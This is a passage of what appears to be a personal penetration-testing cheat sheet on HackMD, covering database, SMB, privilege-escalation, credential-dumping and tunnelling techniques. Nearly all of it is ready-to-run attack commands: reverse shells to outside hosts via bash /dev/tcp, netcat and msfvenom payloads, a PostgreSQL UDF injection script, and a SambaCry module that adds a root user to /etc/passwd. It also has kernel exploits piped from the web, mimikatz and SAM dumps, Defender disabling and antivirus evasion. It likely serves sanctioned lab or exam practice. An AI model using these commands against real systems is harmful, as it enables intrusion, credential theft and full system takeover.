`/etc/mysql/my.cnf` (Debian) - Add 2 line - `general_log_file=/var/log/mysql/mysql_log.log` - `general_log=1` - Restart services - `sudo systemctl restart mysqld` - See Log - `tail -f /var/log/mysql/mysql_log.log` ### MSSQL - Connect - `impacket-mssqlclient -p {port} {UserID}@{IP} -windows-auth` - Default port : 1433 - Shell - `exec xp_cmdshell '{Command}'` - `exec xp_cmdshell '\\192.168.119.210\meow\s443.exe'` - `exec` doesn't need escape character - `xp_cmdshell(net users)` - Can also work but can't `\` - If no permission ``` EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE ``` #### Backup - `C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup/master.mdf` - Or short path `C:/PROGRA~1/MICROS~1/MSSQL1~1.SQL/MSSQL/Backup/master.mdf` - [Invoke-MDFHashes](https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes) - `Add-Type -Path 'OrcaMDF.RawCore.dll'` - `Add-Type -Path 'OrcaMDF.Framework.dll'` - `import-module .\Get-MDFHashes.ps1` - `Get-MDFHashes -mdf "C:\Users\Administrator\Desktop\master.mdf" | Format-List` - Use john ### Oracle - Default Port 1521 - Check version - `nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}` - Brute Force SID - `hydra -L sids-oracle.txt -s 1521 {IP} oracle-sid` - [oracle-sid.txt](https://firebasestorage.googleapis.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LcreDSG0Hi8mv8n8DIw%2F-LcrnYv40ILvFrpjKRkb%2Fsids-oracle.txt?alt=media&token=8206a9f6-af86-4a49-ac71-179ca973d836) - `odat sidguesser -s "{IP}" -p 1521` - Connection - `tnscmd10g status --10G -p {port} -h {IP}` - [ODAT](https://github.com/quentinhardy/odat/releases) - Brute Force Username and Password - `./odat all -s {IP} -p {PORT} -d {SID}` - `--accounts-file` - `patator oracle_login sid={SID} host={IP} user=FILE0 password=FILE1 0=~/Wordlist/users-oracle.txt 1=~/Wordlist/pass-oracle.txt` - `odat all -s 10.11.1.222 -p 1521 -d XEXDB` - RCE - `odat-libc2.12-x86_64 ./odat-libc2.12-x86_64 dbmsscheduler -U {Username} -P {Password} -d {SID} -s {IP} --sysdba --exec "{command}" ` ### PostgreSQL #### Log - `/etc/postgresql/{version}/main/postgresql.conf` - `log_statement = 'all'` - `systemctl restart postgresql` - `tail -f /var/log/postgresql/postgresql-10-main.log` #### UDF (Linux) - https://github.com/martinvw/pg_exec/tree/master/libraries - Download `.so` file - Put them into `/tmp/pg_exec.so` ```python= def do_query(command): pass # implement by yourself loid = 1234 def delete_lo(): command = f"SELECT lo_unlink({loid})" do_query(command) delete_lo() def create_lo(): command = f"SELECT lo_create({loid});" do_query(command) create_lo() pg_exec_binary = open("pg_exec.so",'rb').read() udf = pg_exec_binary.hex() def inject_udf(): for i in range(0,int(round(len(udf)/4096))+1): # Done udf_chunk = udf[i*4096:(i+1)*4096] if len(udf_chunk) == 4096: sql = f"INSERT INTO pg_largeobject (loid, pageno, data) values ({loid}, {i}, decode('{udf_chunk}', 'hex'))" do_query(sql) inject_udf() def lo_export(): command = "SELECT lo_export(1234,'/tmp/pg_exec.so');" do_query(command) lo_export() ``` - `CREATE FUNCTION sys(cstring) RETURNS int as '/tmp/pg_exec.so', 'pg_exec' LANGUAGE 'c' STRICT;` - `SELECT sys($$bash -c "bash -i >& /dev/tcp/10.10.10.10/7777 0>&1"$$);` #### UDF (Windows) - https://github.com/rop-la/PolyUDF - exec - `CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS E'C:\\Users\\Administrator\\Desktop\\PolyUDF.dll', 'sys_exec' LANGUAGE c VOLATILE STRICT COST 1;` - `SELECT sys_exec('ping 10.10.10.10')` - eval (return to stdout) - `CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS int4 AS E'C:\\Users\\Administrator\\Desktop\\PolyUDF.dll', 'sys_eval' LANGUAGE c VOLATILE STRICT COST 1;` - `SELECT sys_eval('ping 10.10.10.10')` ### SMB - smb to shell - `winexe -U '{username}' //{ip} cmd.exe` - `impacket-smbexec '{username}:{password}'@{ip}` - `impacket-psexec {username}:{password}'@{ip}` - Check version - `nmap -p139,445 --script smb-os-discovery -Pn {IP}` - Open Wireshark - `smbclient -N -L "//{IP}/" --option='client min protocol=nt1'` - msf - `scanner/smb/smb_version` - CVE-2017-7494 SambaCry , linux/samba/is_known_pipename - Check vuln - `nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p445 -Pn {IP}` - Check share dir - `nmap --script=smb-enum-shares -p445 -Pn {IP}` - https://github.com/joxeankoret/CVE-2017-7494 - `python2 cve_2017_7494.py -t 10.11.1.146 --custom command.so` - `gcc -o command.so -shared command.c -fPIC` - ```C= #include <stdio.h> #include <unistd.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <stdlib.h> #include <sys/stat.h> int samba_init_module(void) { setresuid(0,0,0); system("echo root1:yeDupmFJ8ut/w:0:0:root:/root:/bin/bash >> /etc/passwd"); return 0; } ``` - List user - `nmap --script smb-enum-users.nse -p445 {IP}` - Low Version - `--option='client min protocol=nt1'` - If got `NT_STATUS_CONNECTION_DISCONNECTED` - Symlink Directory Traversal ( < 3.4.5) - Tested on 3.0.24 - https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually - Samba 2.2.x - Remote Buffer Overflow - Tested on 2.2.7a - https://www.exploit-db.com/exploits/7 - Scan - `python3 enum4linux-ng.py -A {IP}` ### Pop3 - `nmap -Pn --script "pop3-capabilities or pop3-ntlm-info" -sV -p{PORT}` - Dump - `PGPASSWORD="{PASSWORD}" pg_dump {DB_NAME} > test.dump` ### FTP - Home FTP - [Home FTP Server 1.12 - Directory Traversal](https://www.exploit-db.com/exploits/16259) - [Home FTP File Download](https://webcache.googleusercontent.com/search?q=cache:92M05_e2PYcJ:https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/0911-exploits/homeftpserver-traversal.txt+&cd=4&hl=zh-TW&ct=clnk&gl=tw&client=firefox-b-d) - FileZilla - Default password location - `C:\Program Files\FileZilla Server\FileZilla Server.xml` - maybe `(x86)` - WINRM (5985 port) - `sudo gem install evil-winrm` - `evil-winrm -t {IP} -u {User} -p {pass}` ### RDP - Enable - `reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f` - `netsh advfirewall firewall set rule group="remote desktop" new enable=yes` - Add User To RDP Group - `net localgroup "Remote Desktop Users" "{USER_NAME}" /add` ## Privilege - Linux ### Kernel Exploit - [CVE-2017-16995](https://github.com/rlarabee/exploits/tree/master/cve-2017-16995) - Test on Kernel 4.4.0 (4.4.0-116-generic) - `gcc cve-2017-16995.c -o cve-2017-16995` - [CVE-2012-0056 (memodipper)](https://github.com/lucyoa/kernel-exploits/blob/master/memodipper/memodipper.c) - `gcc memodipper.c -o m.out` - [CVE-2010-2959 (i-can-haz-modharden)](https://raw.githubusercontent.com/macubergeek/ctf/master/privilege%20escalation/i-can-haz-modharden.c) - Compile for old OS - `gcc -m32 ./{INPUT.c) -o {OUTPUT} -Wl,--hash-style=both` - `-static` - CVE-2021-4034 (pkexec) (pwnkit) - https://haxx.in/files/blasty-vs-pkexec.c - `gcc blasty-vs-pkexec.c -o meow` - `source <(wget https://raw.githubusercontent.com/azminawwar/CVE-2021-4034/main/exploit.sh -O -)` - https://github.com/ly4k/PwnKit/raw/main/PwnKit - `chmod +x ./PwnKit` - `./PwnKit` - [CVE-2016-5195 (dirtycow)](https://www.exploit-db.com/download/40611) - ``` gcc -pthread 40611.c -o dirtyc0w ./dirtyc0w /etc/passwd "root1:yeDupmFJ8ut/w:0:0:root:/root:/bin/bash " ``` - [CVE-2015-1328 (overlayfs)](https://www.exploit-db.com/download/37292) - Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15 - `gcc ofs.c -o ofs` - `./ofs` - lxd group - `id` -> user has lxd group - `wget https://github.com/saghul/lxd-alpine-builder/raw/master/alpine-v3.13-x86_64-20210218_0139.tar.gz -O alpine.tar.gz` - `lxc image import alpine.tar.gz --alias alpine` - `lxc init alpine privesc -c security.privileged=true` - `lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true` - `lxc start privesc` - `lxc exec privesc /bin/sh` - `cd /mnt/root ....` ### Software - [GTFOBins](https://gtfobins.github.io/) - Linux privileges escalation - [Pspy](https://github.com/DominicBreuker/pspy) - Monitor the process #### Enumeration Scan the system to find which can be use for privileges escalation - [PEASS-ng](https://github.com/carlospolop/PEASS-ng) - [LinEnum](https://github.com/rebootuser/LinEnum) - [LSE](https://github.com/diego-treitos/linux-smart-enumeration) - [Linux-Exploit-Suggester (LES)](https://github.com/mzet-/linux-exploit-suggester) ### Tips - Writable `/etc/passwd` - Append `root1:yeDupmFJ8ut/w:0:0:root:/root:/bin/bash` to file - `root1` : `meow` - Generate hash : `openssl passwd {PASSWORD}` - Add User - `useradd -p $(openssl passwd -1 meow) root1` - Add to sudo group - `usermod -aG sudo root1` ### Program Hijack #### Python - import library priority 1. local file 2. `python -c "import sys;print(sys.path)"` - Check file permission if it can be write - Fake library file ```python import pty pty.spawn("/bin/bash") ``` #### Bash - Relative path is from `$PATH` - We can modify this by - `PATH=/my/fake/path:$PATH ./binary` - Fake path can contain the shell/reverse shell command file ### IP Tables - Clear all rull ```bash iptables -P INPUT ACCEPT iptables -P FORWARD ACCEPT iptables -P OUTPUT ACCEPT iptables -F iptables -X ``` - Check open port - `netstat -tulpn | grep LISTEN` ### Program - `tar` Wildcard - `echo "bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'" > shell.sh` - `chmod 777 shell.sh` - `echo "" > "--checkpoint-action=exec=sh shell.sh"` - `echo "" > --checkpoint=1` - `tar cf archive.tar *` ### Capability - If the program has some special capability - https://man7.org/linux/man-pages/man7/capabilities.7.html - `CAP_SETUID` - Can do with [GTFOBins](https://gtfobins.github.io/) ### Doas - `doas.conf` - if exist `permit nopass {user} as {root} cmd {binary}` - We can `doas {binary}` and it will run as root ### SSH `authorized_keys` Brute force - `/var/backups/ssh/authorized_keys` or `~/.ssh/authorized_keys` - https://gitbook.brainyou.stream/basic-linux/ssh-key-predictable-prng-authorized_keys-process - `git clone https://github.com/g0tmi1k/debian-ssh` - `tar vjxf debian-ssh/common_keys/debian_ssh_dsa_1024_x86.tar.bz2` - `cd debian-ssh/common_keys/dsa/1024/` - `grep -lr '{keys}'` - Find the file name without `.pub` is secret key ### Docker - `/.dockerenv` - If exist, probably in docker - Notice mount point - Mount data `/proc/1/mountinfo` , `/proc/self/mounts` (LFI can read) ### SOP - Check `sudo -l` - What file we can run as super user - Check crontab - `cat /etc/crontab ` - With LinEnum, LinPeas - PsPy check - Check SUID / SGID - `find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null` - `find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null` - With [GTFOBins](https://gtfobins.github.io/) - Check sudo version - [CVE-2019-14287](https://www.exploit-db.com/exploits/47502) - sudo < 1.8.28 - `sudo -u#-1 binary` - [CVE-2010-0426](https://github.com/t0kx/privesc-CVE-2010-0426) Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 - sudoedit - Check $PATH / import library permission - Program Hijack - Check capability - `getcap -r / 2>/dev/null` - Check if the program has some useful capability - Check backup file ## Privilege - Windows ### XP - [Windows XP SP0/SP1 Privilege Escalation to System](https://sohvaxus.github.io/content/winxp-sp1-privesc.html) ### Exploit - https://github.com/SecWiki/windows-kernel-exploits - [EternalBlue MS17-010](https://github.com/helviojunior/MS17-010) - Prepare msf reverse shell exe - run `send_and_execute.py` - Maybe need to change username to `guest` - If can't reply some port - use `zzz_exploit.py` , change `smb_pwn` function - `service_exec(conn,r'cmd /c net user /add meow Me0www')` - `service_exec(conn,r'cmd /c net localgroup administrators meow /add')` - [Cerrudo](https://github.com/Re4son/Churrasco) - Windows Server 2003 - [MS15-051](https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip) - `ms15-051x64.exe whoami` - [JuicyPotato x64](https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe) , [x86](https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe) - User have `SeImpersonate` or `SeAssignPrimaryToken` by `whoami /priv` - `JuicyPotato.exe -l 1337 -p shell7878.exe -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}` - `-c` (Include curly brackets) - CLSID from https://ohpe.it/juicy-potato/CLSID/ - `-p` Exe Program - Not work for Windows Server 2019 and Windows 10 versions 1809 and higher. - [PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0) - Windows Server 2019 and Windows10 - `SeImpersonatePrivilege` Enable - `PrintSpoofer.exe -i -c cmd` - [XP SP0 \~ SP1](https://sohvaxus.github.io/content/winxp-sp1-privesc.html) - `net start SSDPSRV` - `sc config SSDPSRV start= auto` - `sc qc SSDPSRV` - `net start SSDPSRV` - `sc config upnphost binpath= "C:\{abs_path_for_reverse_shell_exe}` - `sc config upnphost obj= ".\LocalSystem" password= ""` - `sc qc upnphost` - `net start upnphost` ### Bypass UAC - [CVE-2019-1388](http://blog.leanote.com/post/snowming/38069f423c76) - [CMSTP UAC Bypass](https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html) - `Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"` - `[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))` - `[CMSTPBypass]::Execute("C:\Users\Batman\tshd_windows_amd64.exe -c 10.10.10.10 -p 8787")` ### Bypass CLM - IF powershell `$ExecutionContext.SessionState.LanguageMode` return `ConstrainedLanguage` = Constrained Language Mode, CLM ; `FullLanguage` = No Limit - Meterperter - `load powershell` - `powershell_shell` - `$ExecutionContext.SessionState.LanguageMode` -> should return `FullLanguage` ### Registry - AlwaysInstallElevated - If both set to 1 - `reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` - `reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` - Can install file with - `msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi` - `msiexec /quiet /i shellx64.msi` - But need to check where can install (AppLocker) - `Get-AppLockerPolicy -Effective | Select -Expandproperty RuleCollections` - Auto login - `reg query HKCU\Software\Microsoft\Windows NT\Currentversion\WinLogon /v DefaultUserName` - `reg query HKCU\Software\Microsoft\Windows NT\Currentversion\WinLogon /v DefaultPassword` ### Defender / Firewall - 64 bit Powershell - `%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe` - Disable Realtime Monitoring - `Set-MpPreference -DisableRealtimeMonitoring $true` - Uninstall Defender - `Uninstall-WindowsFeature -Name Windows-Defender –whatif` - `Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet` - Turn off firewall - `Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False` - Check Defender Status - `powershell -c Get-MpComputerStatus` - Check `AntivirusEnabled` is `True` or `False` ### Check vulnerability - [Windows-Exploit-Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - `systeminfo` - Run in target machine and save to txt file - Dependency - `pip install xlrd==1.2.0` - `windows-exploit-suggester.py --update` - Get new database - `windows-exploit-suggester.py --database {Database file} --systeminfo {systeminfofile}` - [Windows Exploit Suggester - Next Generation](https://github.com/bitsadmin/wesng) - `systeminfo` - `python3 wesng.py --update` - `python3 wesng.py {systeminfofile}` ### Sensitive data - PowerShell History Path - `%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ` - User Home - Desktop - Document - Download - `C:\Windows\System32\drivers\etc\hosts` ### Process - `netstat -ano` - Open Port - `netstat -an | findstr "LISTENING"` - `tasklist` - like ps - `/v` : list user ### Services - Query Services - `sc qc {Services Name}` - Can get the services user - Get all services - `wmic service get name,pathname` ### Permission - `icacls` - Check permission - `/reset` reset the permission to their parent - [cpau](https://www.joeware.net/freetools/tools/cpau/index.htm) - `cpau -u {user_name} -p {password} -ex C:\{abs_exe_path} -LWP` - Run command with given username and password. - Powershell Invoke-Command ```powershell $username = 'USER_NAME' $password = 'PASSWORD' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword Invoke-command -computername COMPUTER_NAME -credential $credential -scriptblock {cmd.exe /c C:\Users\Public\nc.exe -e cmd.exe 10.1.1.1 5 8877 } ``` - Administrator to System - It is a feature - `PsExec -i -s cmd.exe` - Will creat a new window - `PsExec -s cmd` - In current window - `-accepteula` - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec ### User - Create new user - `net user /add {USER_NAME} {USER_PASS}` - Add user to admin group - `net localgroup administrators {USER_NAME} /add` ### AD - List user - `net user` Machine - `net user /domain` AD - `net user {Username} /domain` list user detail - List group - `net group` - `net group /domain` - http://md.stevenyu.tw/zeDGpHb-RVSi0K5xF1HRsQ #### Kerberoast - Get User Hash - [Invoke-Kerberoast.ps1](https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1) - `powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('http://{MY_IP}/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"` - `hashcat -m 13100 ` ### Get User's hash - `impacket-smbserver` - `dir \\{ip}\meow` - Get NETNTLMv2 - Use john to crack! - Dump `sam` / `system` - reg - `reg save hklm\sam c:\sam` - `reg save hklm\system c:\system` - `fgdump.exe` (`locate fgdump.exe`) - Send to windows and just run - It will create a `127.0.0.1.pwdump` hash file - `hashcat -m 1000` - [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases) - `privilege::debug` - `sekurlsa::logonPasswords full` - Dump current computer passwords - `lsadump::dcsync /domain:{DOMAIN NAME} /all /csv` - Dump domain user hash (need domain admin) - `mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"` ### Powershell - If got `cannot be loaded because running scripts is disabled on this system` - type `Set-ExecutionPolicy RemoteSigned` ### Defense Evasion - Shellter - Auto Mode : A - PE Target : `{whoami.exe}` - Stealth mode : N - Custom : C - Payload : `{raw_file}` - `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f raw > {FILE}.raw` - DLL Loader : N - GreatSCT - Must run in x86 kali - `use Bypass` - `msbuild/meterpreter/rev_tcp.py` - `SET LHOST {IP}` - `SET LPORT {PORT}` - `generate` - Get payload xml (Default : `/usr/share/greatsct-output/source/`) - `C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {PATH OF XML}` ### Cross Compile - Linux - `sudo apt-get install gcc-mingw-w64` - Mac - `sudo port install i686-w64-mingw32-gcc` - `sudo port install x86_64-w64-mingw32-gcc` - Compile - `i686-w64-mingw32-gcc meow.c -o meow.exe` - `x86_64-w64-mingw32-gcc meow.c -o meow.exe` ## Password Crack ### Software - Hydra - Crack online services password - SMB,SSH,FTP...... - Usage - ssh - `hydra -l {username} -P {path_to_wordlist} ssh://{ip_address}` - http{s} Post - `hydra -l {username} -P {path_to_wordlist} {domain_name_without http/s} http{s}-post-form "{/{path}}:username=^USER^&password=^PASS^&data=data:{string_if_fail}"` - ftp - `hydra -l {username} -P {wordlist} ftp://{IP}` - Cowbar - `crowbar -b rdp -s {IP}/32 -U {User List} -C {Password List}` - John the ripper - Crack hash like `/etc/shadow` - Support tools - [ssh2john](https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py) - gpg2john - zip2john - samdump2 - NTLM 2 John - `samdump2 system sam > j.txt` - Usage - `john {file} --wordlist={wordlist}` - Hashcat - Crack hash - https://hashcat.net/wiki/doku.php?id=example_hashes - `hashcat -m {mode} {hashes.txt} {wordlist.txt}` - LUKS - `bruteforce-luks -t 10 -f wordlist.txt -v 5 backup.img` - `sudo cryptsetup open --type luks backup.img {mount_name}` - `sudo mount /dev/mapper/{mount_name} mount_point` ### Dictionary - rockyou.txt - https://github.com/danielmiessler/SecLists - [xato-net-10-million-passwords-dup.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/xato-net-10-million-passwords-dup.txt) - Apache Tomcat - `/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt` - `/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt` - Generate Wordlist - Cewl - `cewl http://{IP}/{PATH} | tee wordlist.txt` ### Online - https://crackstation.net/ - https://hashes.com/en/decrypt/hash ## Software - RDP - `xfreerdp +drives /u:{username} /p:{password} /v:{ip}:{port}` - `/size:1800x1000` - `/u:{domain\username}` - FTP - `ls` - `get {file_name}` - `put {file_name}` - Download recursive - `wget -r 'ftp://{ip}/{path}/'` - Unzip - `.gz` - `gunzip {filename.gz}` - tcpdump - Recv icmp : `sudo tcpdump -i tun0 icmp` - Capture package : `tcpdump -i {interface} -s 65535 -w {file.pcap}` - SSH - No matching host key type found. Their offer `...` - `ssh -o HostKeyAlgorithms=+{ssh-rsa}` - No matching key exchange method found. Their offer `...` - `ssh -o KexAlgorithms=+{diffie-hellman-group1-sha1}` - No matching cipher found. Their offer `...` - `ssh -o Ciphers=+{aes128-cbc}` - Zip Path Traversal - e.g. ATutor 2.2.1 Directory Traversal ```python from io import BytesIO import zipfile f = BytesIO() z = zipfile.ZipFile(f,'w',zipfile.ZIP_DEFLATED) z.writestr('../../../../../../../tmp/meow','meowmeow') z.close() with open('poc.zip','wb') as fi: fi.write(f.getvalue()) ``` ### Reverse tunnel forwarding - https://book.hacktricks.xyz/tunneling-and-port-forwarding - [Chisel](https://github.com/jpillora/chisel) - Port - Server : `./chisel server -p {listen_port} --reverse` - listen port can be random - Client : `./chisel client {Remote_host}:{listen_port} R:{forward_port_at_attacker}:127.0.0.1:{forward_port}` - eg. : Remote server run a program at `127.0.0.1:8888`,we need to forward to our attack machine's `127.0.0.1:8888` - `./chisel server -p 9999 --reverse` - `./chisel client 10.10.16.35:9999 R:8888:127.0.0.1:8888` - Proxy - Server `./chisel server -p {listen_port} --reverse` - Client `./chisel client {Remote_host}:{listen_port} R:socks` - Default proxy port : 1080 (sock5) - Set `socks5 127.0.0.1 1080` to `/etc/proxychains4.conf` or firefox proxy - Change proxy port to 9487 - Turn last statement to `R:9487:socks` - SSH - Port Forwarding - `ssh -L {forward_port}:127.0.0.1:{forward_port} {remote_user}@{remote_ip} -p {ssh_port} -N -v -v` - Run in local - eg : Remote `10.87.87.87` run `5555` in remote local, open `2222` port for ssh, we can use following command to forward `5555` to our local `5555` - `ssh -L 5555:127.0.0.1:5555 demo@10.87.87.87 -p 2222 -N -v -v` - Proxy - `ssh -D 127.0.0.1:{PORT} {USER}@{IP}` - socks4, can set to proxychains - nc - Suppose 192.168.5.2:987 is ssh, and can only accept 53 port - `ncat -l 1234 --sh-exec 'ncat 192.168.5.2 987 -p 53'` - `-p 53` means use 53 port to send the data - `ssh user@127.0.0.1 -p 1234` ## Forensics - Unknown files - `file {file_name}` - `binwalk {file_name}` - Extract squashfs patch - `git clone https://github.com/threadexio/sasquatch` - `./build.sh` - `-e` Extract - `xxd {file_name}` - `foremost {file_name}` - dd - `dd if={input_file} bs=1 skip={skip_offset} of={outfile}` ### Steganography - [stegsolve](https://github.com/zardus/ctf-tools/tree/master/stegsolve) - [zsteg](https://github.com/zed-0xff/zsteg) - [steghide](http://steghide.sourceforge.net/) - `steghide extract -sf {file_name}` - exiftool <!-- TODO: https://sushant747.gitbooks.io/total-oscp-guide/content/transfering_files_to_windows.html -->

    Import from clipboard

    Paste your markdown or webpage here...

    Advanced permission required

    Your current role can only read. Ask the system administrator to acquire write and comment permission.

    This team is disabled

    Sorry, this team is disabled. You can't edit this note.

    This note is locked

    Sorry, only owner can edit this note.

    Reach the limit

    Sorry, you've reached the max length this note can be.
    Please reduce the content or divide it to more notes, thank you!

    Import from Gist

    Import from Snippet

    or

    Export to Snippet

    Are you sure?

    Do you really want to delete this note?
    All users will lose their connection.

    Create a note from template

    Create a note from template

    Oops...
    This template has been removed or transferred.
    Upgrade
    All
    • All
    • Team
    No template.

    Create a template

    Upgrade

    Delete template

    Do you really want to delete this template?
    Turn this template into a regular note and keep its content, versions, and comments.

    This page need refresh

    You have an incompatible client version.
    Refresh to update.
    New version available!
    See releases notes here
    Refresh to enjoy new features.
    Your user state has changed.
    Refresh to load new user state.

    Sign in

    Forgot password

    or

    By clicking below, you agree to our terms of service.

    Sign in via Facebook Sign in via Twitter Sign in via GitHub Sign in via Dropbox Sign in with Wallet
    Wallet ( )
    Connect another wallet

    New to HackMD? Sign up

    Help

    • English
    • 中文
    • Français
    • Deutsch
    • 日本語
    • Español
    • Català
    • Ελληνικά
    • Português
    • italiano
    • Türkçe
    • Русский
    • Nederlands
    • hrvatski jezik
    • język polski
    • Українська
    • हिन्दी
    • svenska
    • Esperanto
    • dansk

    Documents

    Help & Tutorial

    How to use Book mode

    Slide Example

    API Docs

    Edit in VSCode

    Install browser extension

    Contacts

    Feedback

    Discord

    Send us email

    Resources

    Releases

    Pricing

    Blog

    Policy

    Terms

    Privacy

    Cheatsheet

    Syntax Example Reference
    # Header Header 基本排版
    - Unordered List
    • Unordered List
    1. Ordered List
    1. Ordered List
    - [ ] Todo List
    • Todo List
    > Blockquote
    Blockquote
    **Bold font** Bold font
    *Italics font* Italics font
    ~~Strikethrough~~ Strikethrough
    19^th^ 19th
    H~2~O H2O
    ++Inserted text++ Inserted text
    ==Marked text== Marked text
    [link text](https:// "title") Link
    ![image alt](https:// "title") Image
    `Code` Code 在筆記中貼入程式碼
    ```javascript
    var i = 0;
    ```    		 
    var i = 0;
    :smile: :smile: Emoji list
    {%youtube youtube_id %} Externals
    $L^aT_eX$ LaTeX
    :::info
    This is a alert area.
    :::

    This is a alert area.
    Versions and GitHub Sync
    Get Full History Access

    • Edit version name
    • Delete

    revision author avatar     named on  

    More Less

    Note content is identical to the latest version.
    Compare
      Choose a version
      No search result
      Version not found
    Sign in to link this note to GitHub
    Learn more
    This note is not linked with GitHub
     

    Feedback

    Submission failed, please try again

    Thanks for your support.

    On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?

    Please give us some advice and help us improve HackMD.

     

    Thanks for your feedback

    Remove version name

    Do you want to remove this version name and description?

    Transfer ownership

    Transfer to
      Warning: is a public team. If you transfer note to this team, everyone on the web can find and read this note.

        Link with GitHub

        Please authorize HackMD on GitHub
        • Please sign in to GitHub and install the HackMD app on your GitHub repo.
        • HackMD links with GitHub through a GitHub App. You can choose which repo to install our App.
        Learn more  Sign in to GitHub

        Push the note to GitHub Push to GitHub Pull a file from GitHub

          Authorize again
         

        Choose which file to push to

        Select repo
        Refresh Authorize more repos
        Select branch
        Select file
        Select branch
        Choose version(s) to push
        • Save a new version and push
        • Choose from existing versions
        Include title and tags
        Available push count

        Pull from GitHub

         
        File from GitHub
        File from HackMD

        GitHub Link Settings

        File linked

        Linked by
        File path
        Last synced branch
        Available push count

        Danger Zone

        Unlink
        You will no longer receive notification when GitHub file changes after unlink.

        Syncing

        Push failed

        Push successfully